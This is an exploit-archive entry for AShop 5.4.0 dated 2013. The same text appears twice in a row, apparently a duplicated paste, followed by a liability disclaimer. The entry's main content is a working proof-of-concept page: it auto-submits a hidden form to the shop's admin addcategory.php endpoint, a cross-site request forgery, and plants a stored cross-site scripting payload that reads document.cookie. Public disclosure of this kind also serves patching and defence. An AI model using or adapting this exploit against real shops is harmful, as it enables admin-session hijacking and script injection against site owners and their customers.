##########################################
# Exploit Title: AShop 5.4.0 CSRF/XSS Vulnerability
# Date: 23-03-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ashopsoftware.com/
# Software Link: http://sourceforge.net/projects/ashop/
# Category: webapps/php
# Version: 5.4.0
##########################################
# Exploit/PoC
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/addcategory.php">
<input type="hidden" name="cat" value="0">
<input type="hidden" name="name" value="<script>alert(document.cookie)</script>"/>
<input type="hidden" name="nlanguage" value="any"/>
<input type="hidden" name="description" value="tst"/>
</form>
</body>
</html>
# Exploit Title: AShop 5.4.0 CSRF/XSS Vulnerability
# Date: 23-03-2013
# Author: DaOne aka Mocking Bird
# Vendor Homepage: http://www.ashopsoftware.com/
# Software Link: http://sourceforge.net/projects/ashop/
# Category: webapps/php
# Version: 5.4.0
##########################################
# Exploit/PoC
<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/addcategory.php">
<input type="hidden" name="cat" value="0">
<input type="hidden" name="name" value="<script>alert(document.cookie)</script>"/>
<input type="hidden" name="nlanguage" value="any"/>
<input type="hidden" name="description" value="tst"/>
</form>
</body>
</html>
//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information